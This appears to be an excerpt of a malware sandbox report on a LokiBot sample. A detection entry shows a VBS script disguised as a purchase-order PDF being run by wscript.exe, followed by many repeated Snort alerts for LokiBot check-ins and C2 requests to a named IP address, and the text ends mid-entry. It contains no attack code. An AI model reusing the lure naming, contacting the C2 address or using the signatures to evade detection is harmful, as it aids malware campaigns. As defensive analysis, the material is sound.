Author: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\#U0410#U0433#U0440#U043e-#U0410#U043b#U044c#U044f#U043d#U0441_(PO_460387320)_pdf.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\#U0410#U0433#U0440#U043e-#U0410#U043b#U044c#U044f#U043d#U0441_(PO_460387320)_pdf.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\#U0410#U0433#U0440#U043e-#U0410#U043b#U044c#U044f#U043d#U0441_(PO_460387320)_pdf.vbs", ProcessId: 5140, ProcessName: wscript.exe

Snort Signatures

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:38.036927
SID:	2024318
Source Port:	49740
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:36.488685
SID:	2024318
Source Port:	49737
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:53.641650
SID:	2024318
Source Port:	49835
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:51.314444
SID:	2021641
Source Port:	49832
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:13.652600
SID:	2025381
Source Port:	49784
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:53.641650
SID:	2024313
Source Port:	49835
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:38.861510
SID:	2025381
Source Port:	49818
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:48.957388
SID:	2021641
Source Port:	49829
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:50.516269
SID:	2825766
Source Port:	49831
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:36.488685
SID:	2024313
Source Port:	49737
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:28.779878
SID:	2825766
Source Port:	49803
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:31.907019
SID:	2024313
Source Port:	49807
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:29.547586
SID:	2021641
Source Port:	49804
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:05.124910
SID:	2024313
Source Port:	49773
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:31:19.370644
SID:	2021641
Source Port:	49865
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:02.814837
SID:	2021641
Source Port:	49770
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:48.181654
SID:	2825766
Source Port:	49828
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:31:21.669304
SID:	2024313
Source Port:	49868
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:34.204192
SID:	2024313
Source Port:	49810
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:31.907019
SID:	2024318
Source Port:	49807
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:31:23.961991
SID:	2024313
Source Port:	49871
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:59.690030
SID:	2825766
Source Port:	49766
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:31:18.590588
SID:	2825766
Source Port:	49864
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:00.493399
SID:	2021641
Source Port:	49767
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:28.699735
SID:	2025381
Source Port:	49723
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:34.204192
SID:	2024318
Source Port:	49810
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:42.736556
SID:	2025381
Source Port:	49821
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:31:21.669304
SID:	2024318
Source Port:	49868
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:54.422589
SID:	2825766
Source Port:	49836
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:31:11.610579
SID:	2021641
Source Port:	49857
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:38.799315
SID:	2825766
Source Port:	49741
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:17.895022
SID:	2025381
Source Port:	49789
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:25.641172
SID:	2825766
Source Port:	49799
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:44.242163
SID:	2025381
Source Port:	49748
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:56.595283
SID:	2021641
Source Port:	49762
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:31:23.961991
SID:	2024318
Source Port:	49871
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:46.592042
SID:	2025381
Source Port:	49826
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:31:17.815577
SID:	2024318
Source Port:	49863
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:34.860100
SID:	2025381
Source Port:	49731
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:57.593507
SID:	2021641
Source Port:	49840
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:31:17.815577
SID:	2024313
Source Port:	49863
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:21.735500
SID:	2825766
Source Port:	49794
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:41.891260
SID:	2024318
Source Port:	49745
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:20.970310
SID:	2024318
Source Port:	49793
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:35.705322
SID:	2021641
Source Port:	49734
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:41.891260
SID:	2024313
Source Port:	49745
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:53.470085
SID:	2825766
Source Port:	49758
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:38.036927
SID:	2024313
Source Port:	49740
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:24.862546
SID:	2024313
Source Port:	49798
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:37.260471
SID:	2021641
Source Port:	49739
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:24.862546
SID:	2024318
Source Port:	49798
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:30.251229
SID:	2825766
Source Port:	49725
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:58.128553
SID:	2025381
Source Port:	49764
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:37.305241
SID:	2024313
Source Port:	49815
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:10.531874
SID:	2024318
Source Port:	49778
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:27.203747
SID:	2025381
Source Port:	49801
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:35.733011
SID:	2021641
Source Port:	49812
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:37.305241
SID:	2024318
Source Port:	49815
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:06.739588
SID:	2021641
Source Port:	49775
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:05.891670
SID:	2825766
Source Port:	49774
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:20.970310
SID:	2024313
Source Port:	49793
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:55.035047
SID:	2024318
Source Port:	49760
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:42.690473
SID:	2825766
Source Port:	49746
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:31:24.825007
SID:	2825766
Source Port:	49872
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:10.531874
SID:	2024313
Source Port:	49778
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:40.344957
SID:	2025381
Source Port:	49743
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:49.735329
SID:	2024318
Source Port:	49830
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:43.454363
SID:	2021641
Source Port:	49747
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:49.735329
SID:	2024313
Source Port:	49830
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:32.673178
SID:	2825766
Source Port:	49808
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:31:07.768549
SID:	2024313
Source Port:	49851
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:34.079276
SID:	2024313
Source Port:	49729
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:34.975531
SID:	2825766
Source Port:	49811
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:34.079276
SID:	2024318
Source Port:	49729
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:45.799677
SID:	2021641
Source Port:	49750
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:31:15.463121
SID:	2025381
Source Port:	49862
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:31:07.768549
SID:	2024318
Source Port:	49851
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:58.921065
SID:	2024313
Source Port:	49765
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:33.293191
SID:	2025381
Source Port:	49728
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:58.921065
SID:	2024318
Source Port:	49765
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:29.470677
SID:	2024318
Source Port:	49724
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:27.986411
SID:	2024313
Source Port:	49802
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:29.470677
SID:	2024313
Source Port:	49724
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:38.088060
SID:	2825766
Source Port:	49816
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:05.124910
SID:	2024318
Source Port:	49773
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:31:05.441892
SID:	2024318
Source Port:	49848
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:39.580792
SID:	2021641
Source Port:	49742
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:27.986411
SID:	2024318
Source Port:	49802
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:26.328739
SID:	2825766
Source Port:	49720
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:55.812911
SID:	2825766
Source Port:	49761
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:31:05.441892
SID:	2024313
Source Port:	49848
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:31:02.332845
SID:	2825766
Source Port:	49844
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:51.920859
SID:	2025381
Source Port:	49756
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:31:01.546959
SID:	2024318
Source Port:	49843
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:31:23.194950
SID:	2025381
Source Port:	49870
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:55.035047
SID:	2024313
Source Port:	49760
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:25.556361
SID:	2021641
Source Port:	49719
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:24.081982
SID:	2025381
Source Port:	49797
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:31:06.206380
SID:	2021641
Source Port:	49849
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:52.865138
SID:	2025381
Source Port:	49834
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:31:01.546959
SID:	2024313
Source Port:	49843
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:41.966393
SID:	2021641
Source Port:	49820
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:46.581121
SID:	2025381
Source Port:	49751
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:20.206304
SID:	2025381
Source Port:	49792
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:42.690473
SID:	2021641
Source Port:	49746
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:31:02.332845
SID:	2021641
Source Port:	49844
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:45.018070
SID:	2024318
Source Port:	49749
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:53.470085
SID:	2024313
Source Port:	49758
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:31:06.206380
SID:	2825766
Source Port:	49849
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:30:52.096160
SID:	2025381
Source Port:	49833
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:29:45.018070
SID:	2024313
Source Port:	49749
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 172.67.148.126

Timestamp:	04/06/24-09:31:04.659572
SID:	2024313
Source Port:	49847
Destination Port:	80
Protocol:	TCP
